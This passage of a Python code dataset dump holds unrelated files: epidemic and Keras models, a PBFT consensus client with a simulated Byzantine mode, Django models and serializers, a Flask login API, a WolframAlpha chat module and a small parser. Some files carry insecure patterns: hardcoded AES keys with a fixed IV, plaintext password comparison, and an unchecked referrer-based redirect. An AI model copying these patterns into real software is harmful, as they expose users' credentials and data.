\"\"\"\n local_parameter_filepath = os.path.join(self.pg_dirpath, \"s2_max_ndvi_local_parameter.json\")\n graph = translate_process_graph(local_parameter_filepath)\n\n assert graph['ndvi_6'].arguments['y'] == 3\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"tests/test_translate.py","file_name":"test_translate.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"487030138","text":"from summer.model import StratifiedModel\nfrom autumn.constants import Compartment, BirthApproach\nfrom autumn.tool_kit.scenarios import get_model_times_from_inputs\n\n\ndef build_model(params: dict) -> StratifiedModel:\n \"\"\"\n Build the master function to run a simple SIR model\n \"\"\"\n compartments = [\n Compartment.SUSCEPTIBLE,\n Compartment.INFECTIOUS,\n Compartment.RECOVERED,\n ]\n\n flows = [\n {\n \"type\": \"infection_frequency\",\n \"parameter\": \"contact_rate\",\n \"origin\": Compartment.SUSCEPTIBLE,\n \"to\": Compartment.INFECTIOUS,\n },\n {\n \"type\": \"standard_flows\",\n \"parameter\": \"recovery_rate\",\n \"origin\": Compartment.INFECTIOUS,\n \"to\": Compartment.RECOVERED,\n },\n ]\n\n integration_times = get_model_times_from_inputs(\n round(params[\"start_time\"]), params[\"end_time\"], params[\"time_step\"]\n )\n\n init_conditions = {Compartment.INFECTIOUS: 1}\n\n sir_model = StratifiedModel(\n integration_times,\n compartments,\n init_conditions,\n params,\n flows,\n infectious_compartment=(Compartment.INFECTIOUS,),\n birth_approach=BirthApproach.NO_BIRTH,\n starting_population=1000000,\n )\n\n return sir_model\n","sub_path":"apps/sir_example/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"198510686","text":"import math\nimport time\nimport socket\nimport sys\nimport select\nimport pickle\nimport datetime\nimport pdb\nfrom Crypto.Cipher import AES\nfrom Crypto import Random\n\ndef roundup(x):\n return int(math.ceil(x / 10.0)) * 10\n\nN = 4\n\nIV = b'\\xa2\\xae\\x8b\\xbd\\xa5GJF\\x13\\xd9!\\xd6\\xad\\x13\\xe8\\xa5'\n\ncid = sys.argv[1]\nSERVER = sys.argv[2]\nPORT = sys.argv[3]\nBYZANTINE = sys.argv[4]\n\nkeys = {\n\t\t\t1: {2: b'Fixteen syte key', 3: b'Bixteen yyte key', 'server': b'Sixteen byte key'}, \n\t\t\t2: {1: b'Fixteen syte key', 3: b'Bilteen byte key', 'server': b'Sixteen syte key'},\n\t\t\t3: {1: b'Bixteen yyte key', 2: b'Bilteen byte key', 'server': b'Bixteen byte key'}\n\t\t}\n\nclient = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\nintro = \"REGISTER_REQUEST \"+str(cid)\nintro = intro.encode()\n\nclient.sendto(intro, (SERVER, int(PORT)))\n\nresponse, address = client.recvfrom(1024)\nneighbors = pickle.loads(response)\nprint(neighbors)\n\nport_mapper = dict()\nfor i in neighbors:\n\tport_mapper[i[2]] = i[0]\n\nport_mapper[int(PORT)] = 'server'\n\nSTAGE = 'PRE' \nmatch_message = \"\"\nmessages = []\nNEW_MESSAGE = False\n\n\nwhile 1:\n\t\tinputready, outputready, exceptrdy = select.select([0, client], [],[], 0.5)\n\n\t\tfor i in inputready:\n\t\t\tif NEW_MESSAGE:\n\t\t\t\tNEW_MESSAGE = False\n\t\t\t\tmessages = []\n\n\t\t\tdata, address = client.recvfrom(1024)\n\t\t\tport = address[1]\n\t\t\tcipher = AES.new(keys[int(cid)][port_mapper[port]], AES.MODE_EAX, IV)\n\t\t\tplaintext = cipher.decrypt(data)\n\t\t\tdata = plaintext[:-plaintext[-1]]\n\t\t\tprint(messages)\n\t\t\tmessages.append(data.decode())\n\n\t\tif not (inputready or 
outputready or exceptrdy):\n\t\t\tif STAGE == 'PRE':\n\t\t\t\tmatch_message = \"PREP10\".encode()\n\t\t\t\tif BYZANTINE == 'n':\n\t\t\t\t\tlength = 16 - (len(match_message) % 16)\n\t\t\t\t\tmatch_message += bytes([length])*length\n\t\t\t\t\tfor i in neighbors:\n\t\t\t\t\t\tcipher = AES.new(keys[int(cid)][i[0]], AES.MODE_EAX, IV)\n\t\t\t\t\t\tciphertext = cipher.encrypt(match_message)\n\t\t\t\t\t\tclient.sendto(ciphertext, (i[3], i[2]))\n\n\t\t\t\t\tcipher = AES.new(keys[int(cid)]['server'], AES.MODE_EAX, IV)\n\t\t\t\t\tciphertext = cipher.encrypt(match_message)\n\t\t\t\t\tclient.sendto(ciphertext, (SERVER, int(PORT)))\n\n\t\t\t\tif BYZANTINE == 'y':\n\t\t\t\t\tmatch = \"PREP11\".encode()\n\t\t\t\t\tlength = 16 - (len(match) % 16)\n\t\t\t\t\tmatch += bytes([length])*length\n\t\t\t\t\tfor i in neighbors:\n\t\t\t\t\t\tcipher = AES.new(keys[int(cid)][i[0]], AES.MODE_EAX, IV)\n\t\t\t\t\t\tciphertext = cipher.encrypt(match)\n\t\t\t\t\t\tclient.sendto(ciphertext, (i[3], i[2]))\n\n\t\t\t\t\tcipher = AES.new(keys[int(cid)]['server'], AES.MODE_EAX, IV)\n\t\t\t\t\tciphertext = cipher.encrypt(match)\n\t\t\t\t\tclient.sendto(ciphertext, (SERVER, int(PORT)))\n\t\t\t\t\n\t\t\t\tSTAGE = 'PREP'\n\t\t\t\tprint(\"Sent prepare\")\n\t\t\t\t\t\t\n\n\t\t\telif STAGE == 'PREP':\n\t\t\t\tmatch_message = \"PREP10\"\n\t\t\t\tif len([match for match in messages if match == \"PREP11\"]) >= 100 or len([match for match in messages if match == \"PREP10\"]) >= 2:\n\t\t\t\t\tmatch_message = \"COMMIT10\".encode()\n\t\t\t\t\tif BYZANTINE == 'n':\n\t\t\t\t\t\tlength = 16 - (len(match_message) % 16)\n\t\t\t\t\t\tmatch_message += bytes([length])*length\n\t\t\t\t\t\tfor i in neighbors:\n\t\t\t\t\t\t\tcipher = AES.new(keys[int(cid)][i[0]], AES.MODE_EAX, IV)\n\t\t\t\t\t\t\tciphertext = cipher.encrypt(match_message)\n\t\t\t\t\t\t\tclient.sendto(ciphertext, (i[3], i[2]))\n\n\t\t\t\t\t\tcipher = AES.new(keys[int(cid)]['server'], AES.MODE_EAX, IV)\n\t\t\t\t\t\tciphertext = cipher.encrypt(match_message)\n\t\t\t\t\t\tclient.sendto(ciphertext, (SERVER, int(PORT)))\n\n\t\t\t\t\tif BYZANTINE == 'y':\n\t\t\t\t\t\tmatch = \"COMMIT11\".encode()\n\t\t\t\t\t\tlength = 16 - (len(match) % 16)\n\t\t\t\t\t\tmatch += bytes([length])*length\n\t\t\t\t\t\tfor i in neighbors:\n\t\t\t\t\t\t\tcipher = AES.new(keys[int(cid)][i[0]], AES.MODE_EAX, IV)\n\t\t\t\t\t\t\tciphertext = cipher.encrypt(match)\n\t\t\t\t\t\t\tclient.sendto(ciphertext, (i[3], i[2]))\n\n\t\t\t\t\t\tcipher = AES.new(keys[int(cid)]['server'], AES.MODE_EAX, IV)\n\t\t\t\t\t\tciphertext = cipher.encrypt(match)\n\t\t\t\t\t\tclient.sendto(ciphertext, (SERVER, int(PORT)))\n\n\t\t\t\t\tprint(\"Sent commit\")\n\t\t\t\t\tSTAGE = 'COMMIT'\n\n\n\t\t\telif STAGE == 'COMMIT':\n\t\t\t\tif BYZANTINE == 'n':\n\t\t\t\t\tmatch_message = \"COMMIT10\"\n\t\t\t\t\tif len([match for match in messages if match == \"PREP11\"]) >= 100 or len([match for match in messages if match == \"COMMIT10\"]) >= 2:\n\t\t\t\t\t\tNEW_MESSAGE = True\n\t\t\t\t\t\tprint(\"committed \", match_message)\n\t\t\t\t\t\tSTAGE = 'PRE'\n\t\t\t\t\t\tprint(\"DONE\")\n\n\t\t\t\tif BYZANTINE == 'y':\n\t\t\t\t\tNEW_MESSAGE = True\n\t\t\t\t\tprint(\"committed \", match_message)\n\t\t\t\t\tSTAGE = 'PRE'\n\t\t\t\t\tprint(\"DONE\")\n\t\t\t\t\n\t\t\t\tt = datetime.datetime.utcnow()\n\t\t\t\tnow = t.second + t.microsecond/1000000.0\n\t\t\t\tfuture = roundup(now)\n\t\t\t\tsleeptime = future - 
now\n\t\t\t\ttime.sleep(sleeptime)","sub_path":"SocketProgramming/PBFT/AttackerTests/test_conn.py","file_name":"test_conn.py","file_ext":"py","file_size_in_byte":4468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"230807697","text":"from django.utils.encoding import python_2_unicode_compatible\nfrom django.core.validators import MinValueValidator\nfrom django.db import models\n\nfrom mapping.common.mixins import TimestampsMixin\n\n\n@python_2_unicode_compatible\nclass Company(TimestampsMixin):\n \"Company\"\n name = models.CharField(\n 'company name',\n max_length=150,)\n\n is_active = models.BooleanField(\n 'active',\n help_text='Company status',\n default=False,)\n\n user_limit = models.PositiveSmallIntegerField(\n 'user limit',\n help_text='Max. number of users allowed',\n default=10,\n validators=[MinValueValidator(1)],)\n\n class Meta:\n verbose_name_plural = 'Companies'\n\n def __str__(self):\n return self.name\n","sub_path":"mapping/accounts/models/company.py","file_name":"company.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"651111920","text":"# -*- coding:utf-8 -*-\nfrom urllib.parse import urlparse, parse_qs\n\nfrom attrdict import AttrDict\nfrom flask import Blueprint\nfrom flask import request\nfrom flask_login import login_user, current_user\n\nfrom meier_app.commons.jwt_token import TokenInfo, create_token\nfrom meier_app.commons.logger import logger\nfrom meier_app.commons.response_data import ResponseData, HttpStatusCode\nfrom meier_app.extensions import db\nfrom meier_app.models.settings import Settings\nfrom meier_app.models.user import User\nfrom meier_app.resources.admin import base\n\nadmin_user_api = Blueprint('admin_user_api', __name__, url_prefix='/admin/user/api')\n\n\n@admin_user_api.route('/user_info', methods=['GET'])\n@base.api_exception_handler\ndef user_info_api():\n user = User.query.filter(User.email == current_user.email).scalar()\n if user is None:\n raise Exception('user_info is none.')\n return ResponseData(code=HttpStatusCode.SUCCESS, data=user.for_user_info).json\n\n\n@admin_user_api.route('/user_info', methods=['PUT'])\n@base.api_exception_handler\ndef update_user_info_api():\n logger.debug(request.headers)\n logger.debug(request.get_json())\n User.query.filter(User.email == current_user.email).update(request.get_json())\n db.session.commit()\n return ResponseData(code=HttpStatusCode.SUCCESS).json\n\n\n@admin_user_api.route('/login', methods=['POST'])\n@base.api_exception_handler\ndef login_api():\n logger.debug(request.referrer)\n req_data = AttrDict(request.get_json())\n logger.debug(req_data)\n settings = Settings.query.first()\n if req_data.email and req_data.password:\n user = User.query.filter(User.email == req_data.email.strip()) \\\n .filter(User.password == req_data.password.strip()).scalar()\n if user:\n token = create_token(token_info=TokenInfo(\n user_name=user.user_name,\n email=user.email,\n profile_image=user.profile_image,\n blog_title=settings.blog_title if settings else None\n ))\n\n user.token = token\n login_user(user)\n next = '/admin/contents'\n if request.referrer:\n url_parsed = urlparse(url=request.referrer)\n if url_parsed.query:\n parsed_qs = parse_qs(url_parsed.query)\n next = parsed_qs.get('next', ['/admin/contents'])[0]\n return ResponseData(code=HttpStatusCode.SUCCESS, data={'next': next}).json\n else:\n return 
ResponseData(code=HttpStatusCode.INVALID_AUTHORIZATION).json\n else:\n return ResponseData(code=HttpStatusCode.INVALID_AUTHORIZATION).json\n","sub_path":"meier_app/resources/admin/user/user_api.py","file_name":"user_api.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"210155590","text":"from keras.layers import Input, Dense, Dropout, Flatten, merge, Reshape\nfrom keras.layers import Convolution1D, MaxPooling1D\nfrom keras.models import Model\nfrom keras.layers import Activation, Dropout, Embedding,Bidirectional, Highway\nfrom keras.layers import LSTM,TimeDistributed\nfrom keras.layers.normalization import BatchNormalization\n\ndef build_cnn_blstm_vec(input_set_size, width, height, mul_nb_classes, matrix):\n\tprint('cnn-blstm-vec model building...')\n\tinputs = Input(shape=(height,),dtype='int32')\n\t#embedd = Embedding(input_set_size, width, input_length=height)(inputs)\n\tembedd = Embedding(input_set_size, width,\n weights=[matrix],\n input_length=height,\n trainable=False)(inputs)\n\t\n\t# conv\n\tconv1_1 = Convolution1D(64, 3, border_mode='same', activation='relu')(embedd)\n\tbn1 = BatchNormalization(mode=1)(conv1_1)\n\tpool1 = MaxPooling1D(pool_length=2)(bn1)\n\tdrop1 = Dropout(0.2)(pool1)\n\t\t\n\t# 2 conv\n\tconv2_1 = Convolution1D(128, 2, border_mode='same', activation='relu')(drop1)\n\tbn2 = BatchNormalization(mode=1)(conv2_1)\n\tpool2 = MaxPooling1D(pool_length=2)(bn2)\n\tdrop2 = Dropout(0.2)(pool2)\n\n\t\n\t# 3 conv\n\tconv3_1 = Convolution1D(192, 2, border_mode='same', activation='relu')(drop2)\n\tbn3 = BatchNormalization(mode=1)(conv3_1)\n\t#pool3 = MaxPooling1D(pool_length=2)(bn3)\n\tdrop3 = Dropout(0.1)(bn3)\n\t'''\t\n\t# 4 conv\n\tconv4_1 = Convolution1D(192, 2, border_mode='same', activation='relu')(drop3)\n\tbn4 = BatchNormalization(mode=1)(conv4_1)\n\t#pool4 = MaxPooling1D(pool_length=2)(bn4)\n\tdrop4 = Dropout(0.1)(bn4)\n\t'''\n\t#b = merge([bn4, drop3], mode='concat')\n\t# blstm\n\tblstm = Bidirectional(LSTM(256, return_sequences=False), merge_mode='sum')(drop3)\n\tdrop = Dropout(0.5)(blstm)\n\t\n\t\n\t# highway\n\t#highway = Highway(128)(drop)\n\t'''\n\t# 3 conv\n\tconv3_1 = Convolution1D(64, 2, border_mode='same', activation='relu')(dropb)\n\tbn3 = BatchNormalization(mode=1)(conv3_1)\n\tpool3 = MaxPooling1D(pool_length=2)(bn3)\n\tdrop3 = Dropout(0.1)(bn3)\n\t#flat = Flatten()(drop3)\n\t'''\n\t\n # output\n\tout1 = Dense(mul_nb_classes[0], activation='sigmoid')(drop)\n\tmerged1 = merge([out1, drop], mode='concat')\n\tout2 = Dense(mul_nb_classes[1], activation='sigmoid')(merged1)\n\tmerged2 = merge([out2, drop], mode='concat')\n\tout3 = Dense(mul_nb_classes[2], activation='sigmoid')(merged2)\n\tmerged3 = merge([out3, drop], mode='concat')\n\tout4 = Dense(mul_nb_classes[3], activation='sigmoid')(merged3)\n\n\tout = [out1, out2, out3, out4]\n\tmodel = Model(input=[inputs], output=out)\n\tmodel.summary()\n\tmodel.compile(loss='binary_crossentropy',\n optimizer='adam',\n metrics=['accuracy'],\n )\n\tprint(\"cnn-blstm-vec model has built.\")\n\treturn model\n\n","sub_path":"model/clstm_vec.py","file_name":"clstm_vec.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"355137029","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('product', 
'0019_auto_20160110_1905'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Order',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('order_time', models.DateTimeField(auto_now_add=True)),\n ('street', models.CharField(max_length=255)),\n ('house_number', models.PositiveIntegerField()),\n ('zipcode', models.PositiveIntegerField()),\n ('city', models.CharField(max_length=40, blank=True)),\n ('phone_number', models.CharField(max_length=20)),\n ('order_status', models.PositiveIntegerField(default=1, verbose_name=b'Order Status', choices=[(1, b'Pending'), (2, b'Processed'), (3, b'Shipped'), (4, b'Done')])),\n ('payment_status', models.PositiveIntegerField(default=1, verbose_name=b'Payment Status', choices=[(1, b'unpaid'), (2, b'paid')])),\n ],\n ),\n ]\n","sub_path":"product/migrations/0020_order.py","file_name":"0020_order.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"90226761","text":"import wolframalpha\nfrom app.mac import mac, signals\nfrom modules.wolfram import config\n\n'''\nSignals this module listens to:\n1. When a message is received (signals.message_received)\n==========================================================\n'''\n@signals.message_received.connect\ndef handle(message):\n request = should_answer(message)\n if request != '':\n mac.send_message(wolfram_answer(request), message.conversation)\n\n\n'''\nActual module code\n==========================================================\n'''\ndef wolfram_answer(message):\n app_id = config.api_key\n client = wolframalpha.Client(app_id)\n answer = \"\"\n try:\n res = client.query(message)\n if hasattr(res, 'pods'):\n answer = next(res.results).text\n else:\n answer = \"I don't have an answer for that\"\n except Exception:\n answer = \"I cannot show the answer here\"\n \n # Hehe\n if answer == \"I was created by Stephen Wolfram and his team.\":\n answer = \"Daniel Cardenas created me but I get these answers from an engine made by Stephen Wolfram and his team.\"\n \n return answer\n \ndef should_answer(message):\n if message.message[:4].lower() == 'mac,':\n return message.message[4:].strip()\n elif message.message[:3].lower() == 'mac':\n return message.message[3:].strip()\n else:\n return \"\"","sub_path":"modules/wolfram/wolfram_mac.py","file_name":"wolfram_mac.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"453875837","text":"import logging\nimport json\n\nclass ParserError(Exception):\n pass\n\n\nclass Tokens:\n NONE = 'NONE'\n IGNORE = 'IGNORE'\n\nclass TokenBuffer:\n def __init__(self, tokens):\n self.tokens = tokens[:]\n self.pointer = 0\n\n #TODO: add increment, decrement and access, and to_bool\n\ndef any_of(*accepts):\n def f(tokens):\n\n for accept in accepts:\n tokens, result = accept(tokens)\n if result not in [Tokens.NONE, Tokens.IGNORE]:\n return tokens, result\n\n return tokens, Tokens.NONE\n\n return f\n\ndef all_of(*accepts):\n def f(tokens):\n orig = tokens[:]\n results = []\n for accept in accepts:\n tokens, result = accept(tokens)\n if result == Tokens.NONE:\n return orig, Tokens.NONE\n elif result == Tokens.IGNORE:\n continue\n else:\n results += [result]\n\n return tokens, results\n\n return f\n\ndef many_of(accept):\n def f(tokens):\n results = []\n while tokens:\n tokens, result = accept(tokens)\n if result == Tokens.NONE:\n break\n elif result == 
Tokens.IGNORE:\n continue\n else:\n results += [result]\n return tokens, results\n return f\n\ndef maybe(accept):\n def f(tokens):\n tokens, result = accept(tokens)\n if result == Tokens.NONE:\n result = Tokens.IGNORE\n return tokens, result\n return f\n\ndef supress(accept):\n def f(tokens):\n tokens, result = accept(tokens)\n if result != Tokens.NONE:\n result = Tokens.IGNORE\n return tokens, result\n return f\n\ndef ignore(accept):\n def f(tokens):\n tokens, result = accept(tokens)\n return tokens, Tokens.IGNORE\n return f\n\ndef no_leading_nl(accept):\n def f(tokens):\n _, token = get_first_token(tokens, ignore=['WS', 'COMMENT'])\n if token == 'NL':\n return tokens, Tokens.IGNORE\n tokens, result = accept(tokens)\n return tokens, result\n return f\n\ndef interlace(accept, delimeter):\n def f(tokens):\n\n results = []\n tokens, result = accept(tokens)\n if result == Tokens.NONE:\n return tokens, Tokens.NONE\n elif result == Tokens.IGNORE:\n pass\n else:\n results += [result]\n\n while True:\n tokens, result = all_of(delimeter, accept)(tokens)\n if result == Tokens.NONE:\n break\n\n results += [result[-1]]\n\n return tokens, results\n return f\n\n\n#TODO: I don't think these are right\nsupress_many_or_zero = lambda accept: supress(many_of(accept))\nignore_many = lambda accept: ignore(many_of(accept))\nsupress_many = lambda accept: all_of(supress(accept), supress_many(accept))\n\n\ndef get_first_token(tokens, ignore=None):\n if ignore == None:\n ignore = ['WS', 'NL', 'COMMENT']\n\n i = 0\n try:\n while tokens[i]['type'] in ignore:\n i += 1\n except IndexError:\n return tokens, None\n\n return tokens[i+1:], tokens[i]\n\n\ndef accept_token(types, ignore=None):\n if ignore == None:\n ignore = ['WS', 'NL', 'COMMENT']\n\n def f(tokens):\n next_tokens, next_token = get_first_token(tokens, ignore)\n\n if isinstance(types, str):\n my_types = [types]\n elif isinstance(types, list):\n my_types = types\n\n if next_token is None:\n return tokens, Tokens.NONE\n\n if next_token['type'] in my_types:\n return next_tokens, {\n 'type': next_token['type'].lower(),\n 'value': next_token['text'],\n }\n\n return tokens, Tokens.NONE\n return f\n\ng_indent = 0\n\ndef debug_accept(accept):\n def f(tokens):\n global g_indent\n\n if g_indent == 0:\n indentation = ' '\n else:\n indentation = (g_indent - 1) * ' ' + '< '\n\n logging.debug('%saccepting: %s -> %s', indentation, accept.__name__, get_first_token(tokens)[1])\n g_indent += 1\n tokens, result = accept(tokens)\n g_indent -= 1\n\n if g_indent == 0:\n indentation = ' '\n else:\n indentation = (g_indent - 1) * ' ' + '> '\n\n if result == Tokens.NONE:\n logging.debug('%sfailed: %s', indentation, accept.__name__)\n elif result == Tokens.IGNORE:\n logging.debug('%signored: %s', indentation, accept.__name__)\n else:\n logging.debug('%saccepted: %s -> %s', indentation, accept.__name__, result)\n\n return tokens, result\n\n return f\n\n@debug_accept\ndef accept_def(tokens): return accept_token('DEF')(tokens)\n@debug_accept\ndef accept_id(tokens): return accept_token('ID')(tokens)\n@debug_accept\ndef accept_ws(tokens): return accept_token('WS')(tokens)\n@debug_accept\ndef accept_nl(tokens): return accept_token('NL')(tokens)\n@debug_accept\ndef accept_comma(tokens): return accept_token('COMMA')(tokens)\n@debug_accept\ndef accept_equal(tokens): return accept_token('EQUAL')(tokens)\n\n@debug_accept\ndef accept_left_curly(tokens): return accept_token('L_CURLY')(tokens)\n@debug_accept\ndef accept_right_curly(tokens): return 
accept_token('R_CURLY')(tokens)\n@debug_accept\ndef accept_left_square(tokens): return accept_token('L_SQUARE')(tokens)\n@debug_accept\ndef accept_right_square(tokens): return accept_token('R_SQUARE')(tokens)\n@debug_accept\ndef accept_left_paren(tokens): return accept_token('L_PAREN')(tokens)\n@debug_accept\ndef accept_right_paren(tokens): return accept_token('R_PAREN')(tokens)\n\n@debug_accept\ndef accept_string_literal(tokens): return accept_token('STRING')(tokens)\n@debug_accept\ndef accept_number(tokens): return accept_token('NUMBER')(tokens)\n\n@debug_accept\ndef accept_plus(tokens): return accept_token('PLUS')(tokens)\n@debug_accept\ndef accept_minus(tokens): return accept_token('MINUS')(tokens)\n@debug_accept\ndef accept_star(tokens): return accept_token('STAR')(tokens)\n@debug_accept\ndef accept_slash(tokens): return accept_token('SLASH')(tokens)\n\n@debug_accept\ndef accept_statement_list(tokens):\n\n tokens, statements = interlace(\n accept_statement,\n many_of(accept_nl)\n )(tokens)\n\n return tokens, statements\n\n@debug_accept\ndef accept_function_args(tokens):\n\n tokens, result = all_of(\n supress(accept_left_square),\n interlace( #TODO: maybe id\n accept_id,\n accept_comma\n ),\n supress(accept_right_square),\n )(tokens)\n\n if result == Tokens.NONE:\n return tokens, Tokens.NONE\n\n [ids] = result\n ids = [x['value'] for x in ids]\n\n return tokens, ids\n\n@debug_accept\ndef accept_lambda_expression(tokens):\n tokens, result = all_of(\n accept_function_args,\n supress(accept_left_curly), #TODO: accept it without curly brackets, if one expression\n accept_statement_list, #TODO: maybe statement_list\n supress(accept_right_curly),\n )(tokens)\n\n if result == Tokens.NONE:\n return tokens, Tokens.NONE\n\n [args, statements] = result\n\n return tokens, {\n 'type': 'lambda_expression',\n 'args': args,\n 'statements': statements,\n }\n\n@debug_accept\ndef accept_function_call(tokens):\n\n tokens, result = all_of(\n supress(accept_left_paren),\n interlace(\n accept_expression,\n accept_comma\n ),\n supress(accept_right_paren),\n )(tokens)\n\n if result == Tokens.NONE:\n return tokens, Tokens.NONE\n\n [parameters] = result\n\n return tokens, parameters\n\n@debug_accept\ndef accept_bracketted_expression(tokens):\n tokens, expression = all_of(\n supress(accept_left_paren),\n accept_expression,\n supress(accept_right_paren),\n )(tokens)\n\n if expression == Tokens.NONE:\n return tokens, Tokens.NONE\n\n [expression] = expression\n\n return tokens, expression\n\n@debug_accept\ndef accept_list_expression(tokens):\n\n # Test for empty list\n tokens, expression = all_of(\n supress(accept_left_square),\n supress(accept_right_square),\n )(tokens)\n\n if expression != Tokens.NONE:\n return tokens, {\n \"type\" : \"list\",\n \"value\": []\n }\n\n tokens, expression = all_of(\n supress(accept_left_square),\n interlace(\n accept_expression,\n accept_comma\n ),\n supress(accept_right_square),\n )(tokens)\n\n if expression == Tokens.NONE:\n return tokens, Tokens.NONE\n\n [expression] = expression\n\n return tokens, {\n \"type\" : \"list\",\n \"value\": expression\n }\n\n\n@debug_accept\ndef accept_atom_expression(tokens):\n\n tokens, expression = any_of(\n accept_lambda_expression,\n accept_list_expression,\n #accept_array_expression,\n #accept_map_expression,\n #accept_set_expression,\n #accept_object_expression,\n #accept_class_expression,\n\n #if_expression\n #for_expression\n #while_expression\n\n accept_id,\n accept_string_literal,\n accept_number,\n accept_bracketted_expression,\n 
)(tokens)\n\n if expression == Tokens.NONE:\n return tokens, Tokens.NONE\n\n prev_result = expression\n\n while tokens:\n\n tokens, parameters = no_leading_nl(\n accept_function_call\n )(tokens)\n\n if parameters == Tokens.NONE:\n break\n\n prev_result = {\n 'type': 'function_call_expression',\n 'function': prev_result['value'] if prev_result['type'] == 'id' else prev_result,\n 'parameters': parameters,\n }\n\n return tokens, prev_result\n\n\n@debug_accept\ndef accept_term_expression(tokens):\n\n tokens, lhs = any_of(\n accept_atom_expression,\n )(tokens)\n\n if lhs == Tokens.NONE:\n return tokens, Tokens.NONE\n\n prev_result = lhs\n\n while tokens:\n\n tokens, other = all_of(\n any_of(\n accept_star,\n accept_slash,\n ),\n accept_atom_expression\n )(tokens)\n\n\n if other == Tokens.NONE:\n break\n\n [sign, rhs] = other\n\n if sign['type'] == 'star':\n function = '__mul__'\n elif sign['type'] == 'slash':\n function = '__div__'\n else:\n raise ParserError('invalid configuration')\n\n prev_result = {\n 'type': 'function_call_expression',\n 'function': function,\n 'parameters': [prev_result, rhs],\n }\n\n return tokens, prev_result\n\n@debug_accept\ndef accept_expression(tokens):\n\n tokens, lhs = any_of(\n accept_term_expression,\n )(tokens)\n\n if lhs == Tokens.NONE:\n return tokens, Tokens.NONE\n\n prev_result = lhs\n\n while tokens:\n\n tokens, other = all_of(\n any_of(\n accept_plus,\n accept_minus,\n ),\n accept_term_expression\n )(tokens)\n\n\n if other == Tokens.NONE:\n break\n\n [sign, rhs] = other\n\n if sign['type'] == 'plus':\n function = '__add__'\n elif sign['type'] == 'minus':\n function = '__sub__'\n else:\n raise ParserError('invalid configuration')\n\n prev_result = {\n 'type': 'function_call_expression',\n 'function': function,\n 'parameters': [prev_result, rhs],\n }\n\n return tokens, prev_result\n\n@debug_accept\ndef accept_declaration_statement(tokens):\n\n tokens, result = all_of(\n accept_def,\n no_leading_nl(accept_id),\n no_leading_nl(accept_expression),\n )(tokens)\n\n if result == Tokens.NONE:\n return tokens, Tokens.NONE\n\n [_, id, value] = result\n\n return tokens, {\n 'type': 'declaration_statement',\n 'name': id['value'],\n 'value': value,\n }\n\n@debug_accept\ndef accept_assignment_statement(tokens):\n tokens, result = all_of(\n accept_id,\n no_leading_nl(accept_equal),\n no_leading_nl(accept_expression),\n )(tokens)\n\n if result == Tokens.NONE:\n return tokens, Tokens.NONE\n\n [id, _, value] = result\n\n return tokens, {\n 'type': 'assignment_statement',\n 'to': id,\n 'value': value,\n }\n\n@debug_accept\ndef accept_statement(tokens):\n\n tokens, statement = any_of(\n accept_declaration_statement,\n accept_assignment_statement,\n accept_expression,\n )(tokens)\n\n return tokens, statement\n\n@debug_accept\ndef accept_top_level(tokens):\n\n tokens, statements = accept_statement_list(tokens)\n\n return tokens, statements\n\ndef parse(tokens):\n\n tokens, statements = accept_top_level(tokens)\n\n result = {\n \"version\": \"0.0.1\",\n \"statements\": statements\n }\n\n return result\n","sub_path":"eye/eyescript/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":12798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"547274086","text":"from rest_framework import serializers\n\nfrom apps.accounts.serializers import UserSerializer\nfrom apps.utils.fields import Base64FileField\nfrom apps.utils.mixins import AwsUrlMixin, FileValidationMixin\nfrom apps.wounds.models import Wound, 
Evolution\n\n\nclass EvolutionSerializer(AwsUrlMixin, serializers.ModelSerializer):\n photo = Base64FileField(max_length=None, use_url=True, write_only=True, required=False, allow_null=True)\n photo_url = serializers.SerializerMethodField()\n thumb_url = serializers.SerializerMethodField()\n width = serializers.DecimalField(write_only=True, max_digits=5, decimal_places=2)\n height = serializers.DecimalField(write_only=True, max_digits=5, decimal_places=2)\n evolution_width = serializers.SerializerMethodField()\n evolution_height = serializers.SerializerMethodField()\n user = UserSerializer(read_only=True)\n\n class Meta:\n model = Evolution\n fields = (\n 'width', 'height', 'evolution_width', 'evolution_height', 'photo_url', 'thumb_url', 'photo', 'wound', 'id',\n 'created', 'user'\n )\n\n def create(self, validated_data):\n validated_data['user'] = self._kwargs['context']['request'].user\n return super().create(validated_data)\n\n def get_photo_url(self, obj):\n return self._get_aws_base64(obj.photo) if obj.photo else None\n\n def get_thumb_url(self, obj):\n return self._get_aws_base64(obj.thumbnail) if obj.thumbnail else None\n\n def get_evolution_width(self, obj):\n return obj.width\n\n def get_evolution_height(self, obj):\n return obj.height\n\n\nclass WoundSerializer(FileValidationMixin, AwsUrlMixin, serializers.ModelSerializer):\n photo = serializers.CharField(write_only=True, required=False, allow_null=True)\n width = serializers.DecimalField(write_only=True, max_digits=5, decimal_places=2)\n height = serializers.DecimalField(write_only=True, max_digits=5, decimal_places=2)\n first_width = serializers.SerializerMethodField()\n first_height = serializers.SerializerMethodField()\n photo_url = serializers.SerializerMethodField()\n thumb_url = serializers.SerializerMethodField()\n file_id = 